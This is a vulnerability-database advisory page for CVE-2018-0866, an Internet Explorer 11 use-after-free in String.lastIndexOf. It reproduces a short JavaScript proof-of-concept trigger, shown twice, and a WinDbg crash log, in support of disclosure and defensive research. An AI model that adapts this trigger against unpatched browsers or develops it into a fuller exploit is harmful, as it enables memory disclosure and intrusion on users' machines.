Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:97148
HistoryFeb 24, 2018 - 12:00 a.m.

IE11: Use-after-free in String.lastIndexOf(CVE-2018-0866)

2018-02-2400:00:00
Root
www.seebug.org
48

0.961 High

EPSS

Percentile

99.3%

JSON

There is a Use-after-free vulnerability in Internet Explorer that could potentially be used for memory disclosure.

This was tested on IE11 running on Window 7 64-bit with the latest patches applied.

PoC:


<script>
var vars = new Array(2);
function main() {
  vars[0] = new Array(1000000);
  vars[1] = String.prototype.substr.call(vars[0], 100);
  var o = {}; o.toString = f8;
  String.prototype.lastIndexOf.call(vars[1], "a", o);
}
function f8(arg7, arg8, arg9) {
  alert(vars[1]);
  CollectGarbage();
}
main();
</script>

Debug log:

(abc.db8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000061 ebx=09929e60 ecx=0ea5848c edx=09555230 esi=0e8700d8 edi=000f41db
eip=6cd18341 esp=0a0cb330 ebp=0a0cb588 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
jscript9!Js::JavascriptString::EntryLastIndexOf+0x15d:
6cd18341 663901          cmp     word ptr [ecx],ax        ds:002b:0ea5848c=????

0:008> k
 # ChildEBP RetAddr  
00 0a0cb588 6cbe6a49 jscript9!Js::JavascriptString::EntryLastIndexOf+0x15d
01 0a0cb5d4 6cc74ad1 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
02 0a0cb5f8 6cbf12fb jscript9!Js::JavascriptFunction::EntryCall+0x95
03 0a0cb808 6cbf1689 jscript9!Js::InterpreterStackFrame::Process+0xc6d
04 0a0cb93c 0b5c0fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
WARNING: Frame IP not in any known module. Following frames may be wrong.
05 0a0cb948 6cbf12fb 0xb5c0fe1
06 0a0cbb48 6cbf1689 jscript9!Js::InterpreterStackFrame::Process+0xc6d
07 0a0cbc64 0b5c0fe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
08 0a0cbc70 6cbe6a49 0xb5c0fe9
09 0a0cbcb4 6cbe6f78 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
0a 0a0cbd28 6cbe6ead jscript9!Js::JavascriptFunction::CallRootFunction+0xb5
0b 0a0cbd70 6cbe6e40 jscript9!ScriptSite::CallRootFunction+0x42
0c 0a0cbdbc 6ccf45cf jscript9!ScriptSite::Execute+0xd2
0d 0a0cbe44 6ccf38ee jscript9!ScriptEngine::ExecutePendingScripts+0x1c6
0e 0a0cbed8 6ccf4e0a jscript9!ScriptEngine::ParseScriptTextCore+0x300
0f 0a0cbf28 6dea5fd8 jscript9!ScriptEngine::ParseScriptText+0x5a
10 0a0cbf60 6db53f88 MSHTML!CActiveScriptHolder::ParseScriptText+0x51
11 0a0cbfb8 6de4c88f MSHTML!CJScript9Holder::ParseScriptText+0x5f
12 0a0cc028 6db542a7 MSHTML!CScriptCollection::ParseScriptText+0x175
13 0a0cc114 6db5495d MSHTML!CScriptData::CommitCode+0x31e
14 0a0cc194 6db552ac MSHTML!CScriptData::Execute+0x232
15 0a0cc1b4 6de7b156 MSHTML!CHtmScriptParseCtx::Execute+0xed
16 0a0cc208 6d89b11e MSHTML!CHtmParseBase::Execute+0x201
17 0a0cc224 6d89ab57 MSHTML!CHtmPost::Broadcast+0x182
18 0a0cc35c 6d92bc2d MSHTML!CHtmPost::Exec+0x617
19 0a0cc37c 6d92bb93 MSHTML!CHtmPost::Run+0x3d
1a 0a0cc398 6db19a4e MSHTML!PostManExecute+0x61
1b 0a0cc3ac 6db1a128 MSHTML!PostManResume+0x7b
1c 0a0cc3dc 6db0e272 MSHTML!CHtmPost::OnDwnChanCallback+0x38
1d 0a0cc3f4 6d7f604e MSHTML!CDwnChan::OnMethodCall+0x2f
1e 0a0cc444 6d7f5b9a MSHTML!GlobalWndOnMethodCall+0x16c
1f 0a0cc498 74ed62fa MSHTML!GlobalWndProc+0x103
20 0a0cc4c4 74ed6d3a user32!InternalCallWinProc+0x23
21 0a0cc53c 74ed77c4 user32!UserCallWinProcCheckWow+0x109
22 0a0cc59c 74ed788a user32!DispatchMessageWorker+0x3b5
23 0a0cc5ac 6ed9abdc user32!DispatchMessageW+0xf
24 0a0cf778 6edcecb8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
25 0a0cf838 76c8971c IEFRAME!LCIETab_ThreadProc+0x3e7
26 0a0cf850 74493a31 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
27 0a0cf888 7507336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
28 0a0cf894 775698f2 kernel32!BaseThreadInitThunk+0xe
29 0a0cf8d4 775698c5 ntdll!__RtlUserThreadStart+0x70
2a 0a0cf8ec 00000000 ntdll!_RtlUserThreadStart+0x1b

0:008> r
eax=00000061 ebx=09929e60 ecx=0ea5848c edx=09555230 esi=0e8700d8 edi=000f41db
eip=6cd18341 esp=0a0cb330 ebp=0a0cb588 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
jscript9!Js::JavascriptString::EntryLastIndexOf+0x15d:
6cd18341 663901          cmp     word ptr [ecx],ax        ds:002b:0ea5848c=????


                                                <!-- saved from url=(0014)about:internet -->
<script>
var vars = new Array(2);
function main() {
  vars[0] = new Array(1000000);
  vars[1] = String.prototype.substr.call(vars[0], 100);
  var o = {}; o.toString = f8;
  String.prototype.lastIndexOf.call(vars[1], "a", o);
}
function f8(arg7, arg8, arg9) {
  alert(vars[1]);
  CollectGarbage();
}
main();
</script>

Related

zdt 1
checkpoint_advisories 1
mscve 1
seebug 1
packetstorm 1
symantec 1
nessus 9
openvas 8
ics 1
mskb 9
prion 13
osv 10
github 10
cvelist 13
cve 13
veracode 12
kaspersky 2
trendmicroblog 1
talosblog 1
zdt
zdt
Microsoft Internet Explorer 11 - Js::RegexHelper::RegexReplace Use-After-Free Exploit
2018-02-20 00:00:00
checkpoint_advisories
checkpoint_advisories
Microsoft Internet Explorer Scripting Engine Memory Corruption (CVE-2018-0866)
2018-02-13 00:00:00
mscve
mscve
Scripting Engine Memory Corruption Vulnerability
2018-02-13 08:00:00
seebug
seebug
IE11: Use-after-free in Js::RegexHelper::RegexReplace(CVE-2018-0866)
2018-02-24 00:00:00
packetstorm
packetstorm
Microsoft IE11 Js::RegexHelper::RegexReplace Use-After-Free
2018-02-22 00:00:00
symantec
symantec
Microsoft Internet Explorer Scripting Engine CVE-2018-0866 Remote Memory Corruption Vulnerability
2018-02-13 00:00:00
nessus
nessus
Security Updates for Internet Explorer (February 2018)
2018-02-13 00:00:00
KB4074597: Windows 8.1 and Windows Server 2012 R2 February 2018 Security Update
2018-02-13 00:00:00
KB4074589: Windows Server 2012 February 2018 Security Update
2018-02-13 00:00:00
openvas
openvas
Microsoft Windows Internet Explorer Multiple RCE Vulnerabilities (KB4074736)
2018-02-14 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4074594)
2018-02-14 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4074598)
2018-02-14 00:00:00
ics
ics
PEPPERL+FUCHS VisuNet RM, VisuNet PC, and Box Thin Client
2018-07-17 12:00:00
mskb
mskb
Cumulative security update for Internet Explorer: February 13, 2018
2018-02-13 08:00:00
February 13, 2018—KB4074593 (Monthly Rollup)
2018-02-13 08:00:00
February 13, 2018—KB4074594 (Monthly Rollup)
2018-02-13 08:00:00
prion
prion
Memory corruption
2018-02-15 02:29:00
Memory corruption
2018-02-15 02:29:00
Memory corruption
2018-02-15 02:29:00
osv
osv
ChakraCore RCE Vulnerability
2022-05-13 01:18:33
ChakraCore RCE Vulnerability
2022-05-13 01:18:32
ChakraCore RCE Vulnerability
2022-05-13 01:18:32
github
github
ChakraCore RCE Vulnerability
2022-05-13 01:18:33
ChakraCore RCE Vulnerability
2022-05-13 01:18:33
ChakraCore RCE Vulnerability
2022-05-13 01:18:32
cvelist
cvelist
CVE-2018-0836
2018-02-13 00:00:00
CVE-2018-0861
2018-02-13 00:00:00
CVE-2018-0866
2018-02-13 00:00:00
cve
cve
CVE-2018-0838
2018-02-15 02:29:00
CVE-2018-0858
2018-02-15 02:29:00
CVE-2018-0834
2018-02-15 02:29:00
veracode
veracode
Remote Code Execution (RCE)
2018-12-04 13:06:24
Remote Code Execution (RCE)
2018-12-04 12:29:39
Remote Code Execution (RCE)
2018-12-04 12:59:47
kaspersky
kaspersky
KLA11200 Multiple vulnerabilties in Microsoft Products (ESU)
2018-02-13 00:00:00
KLA11199 Multiple vulnerabilities in Microsoft Browsers
2018-02-13 00:00:00
trendmicroblog
trendmicroblog
TippingPoint Threat Intelligence and Zero-Day Coverage – Week of February 12, 2018
2018-02-16 13:00:28
talosblog
talosblog
Microsoft Patch Tuesday - February 2018
2018-02-13 13:26:00

0.961 High

EPSS

Percentile

99.3%

JSON
Related for SSV:97148
zdt1checkpoint_advisories1mscve1seebug1packetstorm1symantec1nessus9openvas8ics1mskb9prion13osv10github10cvelist13cve13veracode12kaspersky2trendmicroblog1talosblog1